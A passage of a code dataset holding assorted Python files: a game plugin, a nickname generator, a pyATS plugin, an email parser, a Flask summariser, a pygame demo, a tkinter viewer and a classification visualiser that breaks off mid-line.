self.on_take_damage.add_hook(HookType.PRE, _on_take_damage)\n _is_hooked = True\n\n @property\n def gold(self):\n \"\"\"Getter for player's Hero-Wars gold.\n\n Returns:\n Player's gold\n \"\"\"\n\n return _player_data[self.userid]['gold']\n\n @gold.setter\n def gold(self, gold):\n \"\"\"Setter for player's Hero-Wars gold.\n\n Raises:\n ValueError: If gold is set to a negative value\n \"\"\"\n\n if gold < 0:\n raise ValueError('Attempt to set negative gold for a player.')\n _player_data[self.userid]['gold'] = gold\n\n @property\n def hero(self):\n \"\"\"Getter for player's current hero.\n\n Returns:\n Player's hero\n \"\"\"\n\n return _player_data[self.userid]['hero']\n\n @hero.setter\n def hero(self, hero):\n \"\"\"Setter for player's current hero.\n\n Makes sure player owns the hero and saves his current hero to\n the database before switching to the new one.\n\n Args:\n hero: Hero to switch to\n\n Raises:\n ValueError: Hero not owned by the player\n \"\"\"\n\n # Make sure player owns the hero\n if hero not in self.heroes:\n raise ValueError('Hero {cid} not owned by {steamid}.'.format(\n cid=hero.cid, steamid=self.steamid\n ))\n\n # Make sure the hero is different than player's current hero\n if hero == self.hero:\n return\n\n # If player has a current hero\n if self.hero:\n\n # Save current hero's data\n save_hero_data(self.steamid, self.hero)\n\n # Destroy current hero's items\n for item in self.hero.items:\n if not item.permanent:\n self.hero.items.remove(item)\n\n # Slay the player\n engine_server.client_command(self.edict, 'kill', True)\n\n # Change to the new hero\n _player_data[self.userid]['hero'] = hero\n\n # Reset current restrictions\n self.restrictions.clear()\n\n @property\n def heroes(self):\n \"\"\"Getter for player's heroes.\n\n Returns:\n A list of player's heroes.\n \"\"\"\n\n return _player_data[self.userid]['heroes']\n\n @property\n def restrictions(self):\n \"\"\"Getter for player's restrictions.\n\n Returns:\n A set of player's restricted weapons\n \"\"\"\n\n return _player_data[self.userid]['restrictions']\n\n @restrictions.setter\n def restrictions(self, restrictions):\n \"\"\"Setter for player's restrictions.\"\"\"\n\n self.restrictions.clear()\n self.restrictions.update(set(restrictions))\n","sub_path":"addons/source-python/plugins/hw/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":7306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"559685188","text":"######################################################################## \n'''\nGiven a list of adjectives and a list of nouns, generates a list of \nnicknames with a specified number of syllables\n'''\n\n## header ### \n__author__ = \"Jenhan Tao\" \n__license__ = \"BSD\" \n__email__ = \"jenhantao@gmail.com\" \n\n### imports ### \nimport sys\nfrom itertools import product\n\n### functions ###\ndef countSyllables(word):\n '''\n taken from:http://stackoverflow.com/questions/14541303/count-the-number-of-syllables-in-a-word\n '''\n count = 0\n vowels = 'aeiouy'\n word = word.lower().strip(\".:;?!\")\n if word[0] in vowels:\n count +=1\n for index in range(1,len(word)):\n if word[index] in vowels and word[index-1] not in vowels:\n count +=1\n if word.endswith('e'):\n count -= 1\n if word.endswith('le'):\n count+=1\n if count == 0:\n count +=1\n return count\n\ndef makeNicknames(adjList, nounList, numSyllables):\n '''\n Given a list of adjectives and a list of nouns, generates a list of \n nicknames with a specified number of syllables\n inputs: list of adjectives, list of nouns, number of syllables that \n should appear in nickname\n outputs: prints a list of nicknames satisfying syllable requirements \n to standard out\n '''\n\n # compute cartesian product\n wordPairs = product(adjList, nounList, repeat=1)\n for wp in wordPairs:\n totalSyllables2 = 0\n adjSyl = []\n for w in wp[0].split():\n totalSyllables2 += countSyllables(w)\n \n nounSyl = []\n for w in wp[1].split():\n totalSyllables2 += countSyllables(w)\n\n# print(\"****\")\n# print(wp)\n# print(adjSyl)\n# print(nounSyl)\n# print(totalSyllables, totalSyllables3)\n if totalSyllables2 < numSyllables:\n # word pair satisfies requirement, just print it out\n print(\" \".join([str(x) for x in wp]))\n \n \n\n\n\n### main method ###\nif __name__ == \"__main__\":\n # read in arguments\n if len(sys.argv) < 4:\n print(\"Incorrect number of arguments\")\n print(\"Usage:\")\n print(\"python nickNameGenerator (noun list) (adjective list)\" +\n \" (total syllables, default = 4)\")\n else:\n adjListPath = sys.argv[1]\n nounListPath = sys.argv[2]\n numSyllables = int(sys.argv[3])\n\n # read in adjectives\n with open(adjListPath) as f:\n data = f.readlines()\n adjList = [unicode(line.strip()) for line in data]\n\n # read in nouns\n with open(nounListPath) as f:\n data = f.readlines()\n nounList = [unicode(line.strip()) for line in data]\n\n makeNicknames(adjList, nounList, numSyllables)\n","sub_path":"nickNameGenerator.py","file_name":"nickNameGenerator.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"197648089","text":"# plugins/save.py\nimport logging\nimport shutil\nfrom pyats.easypy.plugins.bases import BasePlugin\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass CopyReport(BasePlugin):\n\n def __init__(self, directory, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._source = directory\n self._dest = 'custom-data'\n\n def post_job(self, job):\n logger.info('The directory to copy: %s; destination: %s', self._source, self._dest)\n shutil.copytree(self._source, f'{job.runtime.directory}/{self._dest}')\n","sub_path":"training/pyats06/plugins/save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"558611625","text":"# https://www.w3.org/Protocols/rfc1341/7_2_Multipart.html\n# https://www.ietf.org/rfc/rfc2183.txt\n# https://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html\n\nimport abc\nimport email\nimport html\nimport bleach # https://github.com/mozilla/bleach\n\n\nclass MyEmailParser(object, metaclass=abc.ABCMeta):\n def __init__(self, email_str):\n self.msg = email.message_from_string(email_str, policy=None)\n\n # WARNING: This may return a .php file, store outside the document root\n # Returns cleaned (\"safe\") HTML code\n # By the say it saves attached files\n def to_html(self):\n if self.msg.is_multipart():\n return self.multipart_to_html()\n else:\n return self.nonmultipart_to_html()\n\n # Internal\n def multipart_to_html(self):\n text = ''\n files = []\n for part in self.msg.walk():\n subtext, subfiles = self.msg_to_html(part)\n if self.msg.get_content_type() == 'multipart/alternative':\n if part.get_content_type() in ('text/html',\n 'application/xhtml+xml',\n 'text/html'):\n text = subtext\n files = subfiles\n else:\n if text and subtext:\n text += \"\\n
    \\n\"\n text += subtext\n files.append(subfiles)\n return text, files\n\n # Internal\n def nonmultipart_to_html(self):\n content = self.msg.get_payload(decode=True)\n if self.msg.get_content_disposition() == 'attachment' or \\\n (not self.msg.get_content_disposition() and self.msg.get_filename()):\n return '', [self.store_file(content, self.msg.get_filename())]\n if self.msg.get_content_type() == 'text/plain':\n return html.escape(content), []\n elif self.msg.get_content_type() in ('text/html', 'application/xhtml+xml'):\n return bleach.clean(content, strip=True, strip_comments=True), []\n return \"\", []\n\n # Note that filename may be None\n @abc.abstractmethod\n def store_file(self, content, filename):\n pass\n # filename = self.dir_for_files + '/' + filename\n # with open(filename, \"w\") as fh:\n # fh.write(content)\n # return filename\n","sub_path":"ouremail/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"418300298","text":"from flask import Flask,render_template,request,make_response,abort, redirect, url_for,session,escape\r\nfrom temp_nltk import url_rize\r\nimport pdfkit\r\nimport re\r\n\r\napp = Flask(__name__)\r\napp.secret_key = 'any random string'\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n\treturn render_template('index1.html')\r\n\r\n@app.route('/success',methods=['GET','POST'])\r\ndef analyze():\r\n\tif request.method == 'POST':\r\n\t\tsession['key'] = 'Key Points'\r\n\t\trawtext = request.form['raw']\r\n\t\ttypesum = request.form['typesum']\r\n\t\tprotext = url_rize(rawtext,typesum)\r\n\t\tsession['title'] = protext[1]\r\n\t\tsession['para'] = protext[0]\r\n\t\tsession['lists'] = protext[2]\r\n\t\trend = render_template('index2.html',rawe=protext[0],title=protext[1],lists=protext[2],key=session['key'])\r\n\t\treturn rend\r\n\r\n@app.route('/indexnew')\r\ndef indexnew():\r\n\tconfig = pdfkit.configuration(wkhtmltopdf='./bin/wkhtmltopdf')\r\n\trender = render_template('pdf.html',para=session['para'],title=session['title'],lists=session['lists'],key=session['key'])\r\n\tpdf = pdfkit.from_string(render, False, configuration=config)\r\n\tresponse = make_response(pdf)\r\n\tresponse.headers['Content-Type'] = 'application/pdf'\r\n\tresponse.headers['Content-Disposition'] = 'attachment; filename=summary.pdf'\r\n\treturn (response)\r\n@app.route('/pdf',methods=['GET','POST'])\r\ndef pdf():\r\n\tif request.method == 'POST':\r\n\t\r\n\t\treturn (redirect(url_for('indexnew')))\r\n\r\n\r\nif __name__ == '__main__':\r\n\tapp.run()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"432692610","text":"import numpy as np\nfrom math import cos, acos, sin, tan, pi, sqrt\n\n#original matrix\nm = np.array([[0, 0, 1], [1, 0, 0], [0, 1, 0]])\n#comparison matrix\ni = np.array([[0, -1.20919958, 1.20919958], [1.20919958, 0, -1.20919958], [-1.20919958, 1.20919958, 0]])\n#epsilon\ne = 10**-6\n\ndef NearZero(z):\n\treturn abs(z) < 1e-6\n\ndef MatrixLog3(R):\n\tif NearZero(np.linalg.norm(R - np.eye(3))):\n\t\treturn np.zeros(3,3)\n\telif NearZero(np.trace(R) + 1):\n\t\tif not NearZero(1 + R[2][2]):\n\t\t\tomg = (1.0 / sqrt(2 * (1 + R[2][2]))) \\\n\t\t\t\t* np.array([R[0][2], R[1][2], 1 + R[2][2]])\n\t\telif not NearZero(1 + R[1][1]): \n\t\t\tomg = (1.0 / sqrt(2 * (1 + R[1][1]))) \\\n\t\t\t\t* np.array([R[0][1], 1 + R[1][1], R[2][1]])\n\t\telse:\n\t\t\tomg = (1.0 / sqrt(2 * (1 + R[0][0]))) \\\n\t\t\t\t* np.array([1 + R[0][0], R[1][0], R[2][0]])\n\t\treturn VecToso3(pi*omg)\n\telse:\n\t\tacosinput = (np.trace(R) - 1) / 2.0\n\t\tif acosinput > 1:\n\t\t\tacosinput = 1\n\t\telif acosinput < -1:\n\t\t\tacosinput = -1\t\t\n\t\ttheta = acos(acosinput)\n\t\treturn theta / 2.0 / sin(theta) * (R - np.array(R).T)\n\n#creating so(3) representation of expontential coordinates\nso3 = MatrixLog3(m)\ndifResult = so3 - i\n\n#comparing matrix\ndef compare(test):\n\tif(test.all() == m.all()):\n\t\tprint(\"True: the matrix matches\")\n\t\tprint(test)\n\t\treturn True\n\telse:\n\t\tprint(\"False: the matrix does not match\")\n\t\tprint(test)\n\t\treturn False\n\n#comparing epsilon\ndef threshold(test2):\n\tif(test2.all() <= e):\n\t\tprint(\"True: it is less than epsilon (10^-6)\")\n\t\tprint(test2)\n\t\treturn True\n\telse:\n\t\tprint(\"False: it is not less than epsilon (10^-6)\")\n\t\tprint(test2)\n\t\treturn False\n\nresult = compare(so3)\nepsilon = threshold(difResult)\n","sub_path":"KevinsCode/Lab3/ex3.45.py","file_name":"ex3.45.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"330693682","text":"\"\"\" drawDemo.py\r\n demonstrate using the drawing\r\n features in pygame\"\"\"\r\n\r\nimport pygame, math\r\npygame.init()\r\n\r\ndef drawStuff (background):\r\n \"\"\" given a surface, draws a bunch of things on it \"\"\"\r\n\r\n #draw a line from (5, 100) to (100, 100)\r\n pygame.draw.line(background, (255, 0, 0), (5, 100), (100, 100))\r\n\r\n #draw an unfilled square\r\n pygame.draw.rect(background, (0, 255, 0), ((200, 5), (100, 100)), 3)\r\n\r\n #draw a filled circle\r\n pygame.draw.circle(background, (0, 0, 255), (400, 50), 45)\r\n\r\n #draw an arc\r\n pygame.draw.arc(background, (0, 0, 0), ((5, 150), (100, 100)), 0, math.pi/2, 5)\r\n\r\n #draw an ellipse\r\n pygame.draw.ellipse(background, (0xCC, 0xCC, 0x00), ((150, 150), (150, 100)), 0)\r\n\r\n #draw lines,\r\n points = (\r\n (370, 160),\r\n (370, 237),\r\n (372, 193),\r\n (411, 194),\r\n (412, 237),\r\n (412, 160),\r\n (412, 237),\r\n (432, 227),\r\n (436, 196),\r\n (433, 230)\r\n )\r\n \r\n pygame.draw.lines(background, (0xFF, 0x00, 0x00), False, points, 3)\r\n\r\n #draw polygon\r\n points = (\r\n (137, 372),\r\n (232, 319),\r\n (383, 335),\r\n (442, 389),\r\n (347, 432),\r\n (259, 379),\r\n (220, 439),\r\n (132, 392),\r\n )\r\n pygame.draw.polygon(background, (0x33, 0xFF, 0x33), points)\r\n\r\n #compare normal and anti-aliased diagonal lines\r\n pygame.draw.line(background, (0, 0, 0), (480, 425), (550, 325), 1)\r\n pygame.draw.aaline(background, (0, 0, 0), (500, 425), (570, 325), 1)\r\n\r\n def main():\r\n screen = pygame.display.set_mode((640, 480))\r\n pygame.display.set_caption(\"Drawing commands\")\r\n background = pygame.Surface(screem.get_size())\r\n background = background.convert()\r\n background.fill((255, 255, 255))\r\n\r\n drawStuff(background)\r\n\r\n clock = pygame.time.Clock()\r\n keepGoing = True\r\n while keepGoing:\r\n clock.tick(30)\r\n for event in pygame.event.get():\r\n if(even.type == pygame.QUIT):\r\n keepgGoing = False\r\n elif(event.type == pygame.MOUSEBUTTONUP):\r\n print(\"pygame.mouse.get_pos()\")\r\n screen.blit(background, (0, 0))\r\n pygame.display.flip()\r\n if(__name__ == \"__main__\"):\r\n main()\r\n","sub_path":"Mini Projects/drawDemo.py","file_name":"drawDemo.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"35866500","text":"# this for contains all the Book lending information\r\n\r\nfrom tkinter import *\r\nfrom tkinter.ttk import Treeview\r\nimport Database.database\r\n\r\n\r\nclass BookLendingWindow:\r\n\r\n def __init__(self):\r\n self.win = Tk()\r\n self.canvas = Canvas(self.win, width=800, height=420, bg='white')\r\n self.canvas.pack(expand=YES, fill=BOTH)\r\n\r\n # show window in center of the screen\r\n width = self.win.winfo_screenwidth()\r\n height = self.win.winfo_screenheight()\r\n x = int(width / 2 - 800 / 2)\r\n y = int(height / 2 - 420 / 2)\r\n str1 = \"800x420+\" + str(x) + \"+\" + str(y)\r\n self.win.geometry(str1)\r\n\r\n # disable resize window\r\n self.win.resizable(False, False)\r\n\r\n # changing title of the window\r\n self.win.title(\"| BOOK LENDING DETAILS | LIBRARY MANAGEMENT SYSTEM |\")\r\n\r\n def add_frame(self):\r\n self.frame = Frame(self.win, height=420, width=800)\r\n self.frame.place(x=0, y=0)\r\n\r\n x, y = 0, 0\r\n\r\n self.label = Label(self.frame, text=\"VIEW BOOK LENDING DETAILS\", fg='black')\r\n self.label.config(font=(\"Poppins\", 20, 'underline bold'))\r\n self.label.place(x=185, y=30)\r\n\r\n # use tree view to show details from the table\r\n self.tr = Treeview(self.frame, columns=('A', 'B', 'C'), selectmode=\"extended\")\r\n\r\n # heading key + text\r\n self.tr.heading('#0', text='BOOK_ID')\r\n self.tr.column('#0', minwidth=0, width=120, stretch=NO)\r\n self.tr.heading('#1', text='STUDENT_ID')\r\n self.tr.column('#1', minwidth=0, width=120, stretch=NO)\r\n self.tr.heading('#2', text='ISSUE_DATE')\r\n self.tr.column('#2', minwidth=0, width=120, stretch=NO)\r\n self.tr.heading('#3', text='RETURN_DATE')\r\n self.tr.column('#3', minwidth=0, width=120, stretch=NO)\r\n # self.tr.heading('#4', text='FINE')\r\n # self.tr.column('#4', minwidth=0, width=100, stretch=NO)\r\n\r\n j = 0\r\n for i in Database.database.BookLend():\r\n self.tr.insert('', index=j, text=i[0], values=(i[1], i[2], i[3]))\r\n j += 1\r\n\r\n self.tr.place(x=155, y=y + 100)\r\n\r\n self.win.mainloop()\r\n","sub_path":"ViewLending.py","file_name":"ViewLending.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"70307917","text":"# import standard plotting \nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nfrom IPython.display import clear_output\n\n# other basic libraries\nimport math\nimport time\nimport copy\nimport autograd.numpy as np\n\n# patch / convex hull libraries\nfrom matplotlib.patches import Circle, Wedge, Polygon\nfrom matplotlib.collections import PatchCollection\nfrom scipy.spatial import ConvexHull\n\n# import optimizer class from same library\nfrom . import optimizers\n\nclass Visualizer:\n '''\n Demonstrate one-versus-all classification\n \n '''\n \n #### initialize ####\n def __init__(self,data): \n # grab input\n data = data.T\n self.data = data\n self.x = data[:,:-1]\n if self.x.ndim == 1:\n self.x.shape = (len(self.x),1)\n self.y = data[:,-1]\n self.y.shape = (len(self.y),1)\n \n # colors for viewing classification data 'from above'\n self.colors = [[1,0,0.4], [ 0, 0.4, 1],[0, 1, 0.5],[1, 0.7, 0.5],[0.7, 0.6, 0.5],'mediumaquamarine']\n\n #self.colors = ['cornflowerblue','salmon','lime','bisque','mediumaquamarine','b','m','g']\n \n # create instance of optimizers\n self.opt = optimimzers.MyOptimizers()\n \n ### cost functions ###\n # the counting cost function\n def counting_cost(self,w):\n cost = 0\n for p in range(0,len(self.y)):\n x_p = self.x[p]\n y_p = self.y[p]\n a_p = w[0] + sum([a*b for a,b in zip(w[1:],x_p)])\n cost += (np.sign(a_p) - y_p)**2\n return 0.25*cost\n \n # the perceptron relu cost\n def relu(self,w):\n cost = 0\n for p in range(0,len(self.y_temp)):\n x_p = self.x[p]\n y_p = self.y_temp[p]\n a_p = w[0] + sum([a*b for a,b in zip(w[1:],x_p)])\n cost += np.maximum(0,-y_p*a_p)\n return cost\n\n # the convex softmax cost function\n def softmax(self,w):\n cost = 0\n for p in range(0,len(self.y_temp)):\n x_p = self.x[p]\n y_p = self.y_temp[p]\n a_p = w[0] + sum([a*b for a,b in zip(w[1:],x_p)])\n cost += np.log(1 + np.exp(-y_p*a_p))\n return cost\n \n ### compare grad descent runs - given cost to counting cost ###\n def solve_2class_subproblems(self,**kwargs):\n # parse args\n max_its = 5\n if 'max_its' in kwargs:\n max_its = kwargs['max_its']\n alpha = 10**-3\n if 'alpha' in kwargs:\n alpha = kwargs['alpha'] \n steplength_rule = 'none'\n if 'steplength_rule' in kwargs:\n steplength_rule = kwargs['steplength_rule']\n version = 'unnormalized'\n if 'version' in kwargs:\n version = kwargs['version'] \n algo = 'newtons_method'\n if 'algo' in kwargs:\n algo = kwargs['algo']\n \n #### perform all optimizations ###\n self.g = self.softmax\n if 'cost' in kwargs:\n cost = kwargs['cost']\n if cost == 'softmax':\n self.g = self.softmax\n if cost == 'relu':\n self.g = self.relu\n\n # loop over subproblems and solve\n self.W = []\n num_classes = np.size(np.unique(self.y))\n for i in range(0,num_classes):\n print ('solving sub-problem number ' + str(i+1))\n # prepare temporary C vs notC sub-probem labels\n self.y_temp = copy.deepcopy(self.y)\n ind = np.argwhere(self.y_temp == (i))\n ind = ind[:,0]\n ind2 = np.argwhere(self.y_temp != (i))\n ind2 = ind2[:,0]\n self.y_temp[ind] = 1\n self.y_temp[ind2] = -1\n\n # solve the current subproblem\n if algo == 'gradient_descent':# run gradient descent\n w_hist = self.opt.gradient_descent(g = self.g,w = np.random.randn(np.shape(self.x)[1]+1,1),version = version,max_its = max_its, alpha = alpha,steplength_rule = steplength_rule)\n elif algo == 'newtons_method':\n w_hist = self.opt.newtons_method(g = self.g,w = np.random.randn(np.shape(self.x)[1]+1,1),max_its = max_its,epsilon = 10**(-5))\n \n # store best weight for final classification \n g_count = []\n for j in range(len(w_hist)):\n w = w_hist[j]\n gval = self.g(w)\n g_count.append(gval)\n ind = np.argmin(g_count)\n w = w_hist[ind]\n \n # normalize normal vectors for each classifier\n w_norm = sum([v**2 for v in w[1:]])**(0.5)\n w_1N = [v/w_norm for v in w]\n self.W.append(w_1N)\n \n # reshape\n self.W = np.asarray(self.W)\n self.W.shape = (num_classes,np.shape(self.x)[1] + 1)\n \n # plotting function for the data and individual separators\n def plot_data_and_subproblem_separators(self):\n # determine plotting ranges\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # initialize figure, plot data, and dress up panels with axes labels etc.\n num_classes = np.size(np.unique(self.y))\n \n ##### setup figure to plot #####\n # initialize figure\n fig = plt.figure(figsize = (9,5))\n gs = gridspec.GridSpec(2, num_classes) \n \n # create subplots for each sub-problem\n r = np.linspace(minx,maxx,400)\n for a in range(0,num_classes):\n # setup current axis\n ax = plt.subplot(gs[a],aspect = 'equal'); \n\n # get current weights\n w = self.W[a]\n \n # color current class\n ax.scatter(self.x[:,0], self.x[:,1], s = 30,color = '0.75')\n t = np.argwhere(self.y == a)\n t = t[:,0]\n ax.scatter(self.x[t,0],self.x[t,1], s = 50,color = self.colors[a],edgecolor = 'k',linewidth = 1.5)\n\n # draw subproblem separator\n z = - w[0]/w[2] - w[1]/w[2]*r\n ax.plot(r,z,linewidth = 2,color = self.colors[a],zorder = 3)\n ax.plot(r,z,linewidth = 2.75,color = 'k',zorder = 2)\n\n # dress panel correctly\n ax.set_xlim(minx,maxx)\n ax.set_ylim(minx,maxx)\n ax.axis('off')\n \n # plot final panel with all data and separators\n ax4 = plt.subplot(gs[num_classes + 1],aspect = 'equal'); \n self.plot_data(ax4)\n self.plot_all_separators(ax4)\n\n # dress panel\n ax4.set_xlim(minx,maxx)\n ax4.set_ylim(minx,maxx)\n ax4.axis('off')\n \n plt.show()\n \n # show data\n def show_dataset(self):\n # initialize figure\n fig = plt.figure(figsize = (8,4))\n artist = fig\n gs = gridspec.GridSpec(1, 3,width_ratios = [1,3,1]) \n\n # setup current axis\n ax = plt.subplot(gs[1],aspect = 'equal'); \n \n # run axis through data plotter\n self.plot_data(ax)\n \n # determine plotting ranges\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # dress panel\n ax.set_xlim(minx,maxx)\n ax.set_ylim(minx,maxx)\n \n plt.show()\n \n # color indnividual region using fusion rule\n def show_fusion(self,region):\n # generate input range for viewing range\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # initialize figure\n fig = plt.figure(figsize = (8,4))\n artist = fig\n gs = gridspec.GridSpec(1, 3,width_ratios = [1,3,1]) \n\n # setup current axis\n ax = plt.subplot(gs[1],aspect = 'equal'); \n \n # plot panel with all data and separators\n self.plot_data(ax)\n self.plot_all_separators(ax)\n \n # color region\n self.region_coloring(region = region,ax = ax)\n \n # dress panel\n ax.set_xlim(minx,maxx)\n ax.set_ylim(minx,maxx)\n ax.axis('off')\n \n # show coloring of entire space\n def show_complete_coloring(self):\n # generate input range for viewing range\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # initialize figure\n fig = plt.figure(figsize = (8,4))\n gs = gridspec.GridSpec(1, 2,width_ratios = [1,1]) \n\n # setup current axis\n ax = plt.subplot(gs[0],aspect = 'equal');\n ax2 = plt.subplot(gs[1],aspect = 'equal');\n \n # plot panel with all data and separators\n self.plot_data(ax)\n self.plot_data(ax2)\n self.plot_all_separators(ax)\n \n ### draw multiclass boundary on right panel\n r = np.linspace(minx,maxx,2000)\n w1_vals,w2_vals = np.meshgrid(r,r)\n w1_vals.shape = (len(r)**2,1)\n w2_vals.shape = (len(r)**2,1)\n o = np.ones((len(r)**2,1))\n h = np.concatenate([o,w1_vals,w2_vals],axis = 1)\n pts = np.dot(self.W,h.T)\n g_vals = np.argmax(pts,axis = 0)\n\n # vals for cost surface\n w1_vals.shape = (len(r),len(r))\n w2_vals.shape = (len(r),len(r))\n g_vals.shape = (len(r),len(r))\n \n # plot contour\n C = len(np.unique(self.y))\n ax2.contour(w1_vals,w2_vals,g_vals,colors = 'k',levels = range(0,C+1),linewidths = 2.75,zorder = 4)\n ax2.contourf(w1_vals,w2_vals,g_vals+1,colors = self.colors[:],alpha = 0.2,levels = range(0,C+1))\n ax.contourf(w1_vals,w2_vals,g_vals+1,colors = self.colors[:],alpha = 0.2,levels = range(0,C+1))\n\n # dress panel\n ax.set_xlim(minx,maxx)\n ax.set_ylim(minx,maxx)\n ax.axis('off')\n \n ax2.set_xlim(minx,maxx)\n ax2.set_ylim(minx,maxx)\n ax2.axis('off') \n \n # point and projection illustration\n def point_and_projection(self,point1,point2):\n # generate range for viewing limits\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # initialize figure\n fig = plt.figure(figsize = (8,4))\n gs = gridspec.GridSpec(1, 2,width_ratios = [1,1]) \n\n # setup current axis\n ax = plt.subplot(gs[0],aspect = 'equal');\n ax2 = plt.subplot(gs[1],aspect = 'equal');\n \n ### plot left panel - data, separators, and region coloring\n self.plot_data(ax)\n self.plot_all_separators(ax) \n \n ### determine projections etc.,\n point = [1] + point1\n point = np.asarray(point)\n point.shape = (len(point),1)\n y = np.dot(self.W,point)\n ind = np.argwhere(y > 0)\n if np.size(ind) == 0:\n num_classes = len(np.unique(self.y))\n ind = np.arange(num_classes).tolist()\n else:\n ind = [v[0] for v in ind]\n point = point[1:]\n ax.scatter(point[0],point[1],c = 'k',edgecolor = 'w',linewidth = 1,s = 90)\n\n # loop over classifiers and project\n for i in ind:\n # get weights\n w = self.W[i]\n w = np.asarray(w)\n w.shape = (len(w),1)\n w_norm = sum([v**2 for v in w[1:]])\n\n # make projected point\n add_on = w[0] + sum([v*a for v,a in zip(point,w[1:])])\n add_on /= w_norm\n proj_point = copy.deepcopy(point)\n proj_point -= add_on*w[1:]\n\n # projected point\n ax.scatter(proj_point[0],proj_point[1],c = self.colors[i],edgecolor = 'k',linewidth = 1,s = 60,zorder = 4,marker = 'X')\n \n # dashed line\n l = np.linspace(proj_point[0],point[0],200)\n b = np.linspace(proj_point[1],point[1],200)\n ax.plot(l,b,linewidth = 1,linestyle = '--',color = 'k',zorder = 3)\n \n # dress panels\n ax.set_xlim(minx,maxx)\n ax.set_ylim(minx,maxx)\n ax.axis('off')\n\n ### plot left panel - data, separators, and region coloring\n self.plot_data(ax2)\n self.plot_all_separators(ax2) \n \n ### determine projections etc.,\n point = [1] + point2\n point = np.asarray(point)\n point.shape = (len(point),1)\n y = np.dot(self.W,point)\n ind = np.argwhere(y > 0)\n if np.size(ind) == 0:\n num_classes = len(np.unique(self.y))\n ind = np.arange(num_classes).tolist()\n else:\n ind = [v[0] for v in ind]\n point = point[1:]\n ax2.scatter(point[0],point[1],c = 'k',edgecolor = 'w',linewidth = 1,s = 90)\n\n # loop over classifiers and project\n for i in ind:\n # get weights\n w = self.W[i]\n w = np.asarray(w)\n w.shape = (len(w),1)\n w_norm = sum([v**2 for v in w[1:]])\n\n # make projected point\n add_on = w[0] + sum([v*a for v,a in zip(point,w[1:])])\n add_on /= w_norm\n proj_point = copy.deepcopy(point)\n proj_point -= add_on*w[1:]\n\n # projected point\n ax2.scatter(proj_point[0],proj_point[1],c = self.colors[i],edgecolor = 'k',linewidth = 1,s = 60,zorder = 4,marker = 'X')\n \n # dashed line\n l = np.linspace(proj_point[0],point[0],200)\n b = np.linspace(proj_point[1],point[1],200)\n ax2.plot(l,b,linewidth = 1,linestyle = '--',color = 'k',zorder = 3)\n \n # dress panels\n ax2.set_xlim(minx,maxx)\n ax2.set_ylim(minx,maxx)\n ax2.axis('off')\n\n ###### utility functions - individual data/separators plotters ###### \n # plot regions colored by classification\n def region_coloring(self,region,ax): \n #### color first regions ####\n # generate input range for functions\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # plot over range\n r = np.linspace(minx,maxx,200)\n x1_vals,x2_vals = np.meshgrid(r,r)\n x1_vals.shape = (len(r)**2,1)\n x2_vals.shape = (len(r)**2,1)\n o = np.ones((len(r)**2,1))\n x = np.concatenate([o,x1_vals,x2_vals],axis = 1)\n \n ### for region 1, determine points that are uniquely positive for each classifier ###\n ind_set = []\n y = np.dot(self.W,x.T)\n num_classes = np.size(np.unique(self.y))\n \n if region == 1 or region == 'all':\n for i in range(0,num_classes): \n class_inds = np.arange(num_classes)\n class_inds = np.delete(class_inds,(i),axis = 0)\n\n # loop over non-current classifier\n ind = np.argwhere(y[class_inds[0]] < 0).tolist()\n ind = [s[0] for s in ind]\n for j in range(1,len(class_inds)):\n c_ind = class_inds[j]\n ind2 = np.argwhere(y[c_ind] < 0).tolist()\n ind2 = [s[0] for s in ind2]\n ind = [s for s in ind if s in ind2] \n\n ind2 = np.argwhere(y[i] > 0).tolist()\n ind2 = [s[0] for s in ind2]\n ind = [s for s in ind if s in ind2]\n\n # plot polygon over region defined by ind\n x1_ins = np.asarray([x1_vals[s] for s in ind])\n x1_ins.shape = (len(x1_ins),1)\n x2_ins = np.asarray([x2_vals[s] for s in ind])\n x2_ins.shape = (len(x2_ins),1)\n h = np.concatenate((x1_ins,x2_ins),axis = 1)\n vertices = ConvexHull(h).vertices\n poly = [h[v] for v in 